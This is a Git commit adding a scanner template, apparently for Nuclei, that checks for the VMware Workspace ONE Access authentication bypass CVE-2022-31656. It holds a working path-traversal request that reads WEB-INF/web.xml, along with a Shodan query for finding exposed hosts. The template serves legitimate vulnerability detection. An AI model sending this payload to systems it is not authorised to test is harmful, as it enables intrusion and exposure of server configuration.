Create CVE-2022–31656.yaml

patch-1
Dhiyaneshwaran 2022-08-10 17:54:02 +05:30 committed by GitHub
parent 32100c6b22
commit b90049060c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 39 additions and 0 deletions

View File

@ -0,0 +1,39 @@
id: CVE-202231656
info:
name: VMware Authentication Bypass
author: DhiyaneshDk
severity: high
description: |
VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
reference:
- https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd
- https://www.vmware.com/security/advisories/VMSA-2022-0021.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31656
- https://nvd.nist.gov/vuln/detail/CVE-2022-31656
metadata:
verified: true
shodan-query: http.favicon.hash:-1250474341
tags: cve,cve2022,vmware,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/SAAS/t/_/;/WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<web-app"
condition: and
- type: word
part: header
words:
- "application/xml"
- type: status
status:
- 200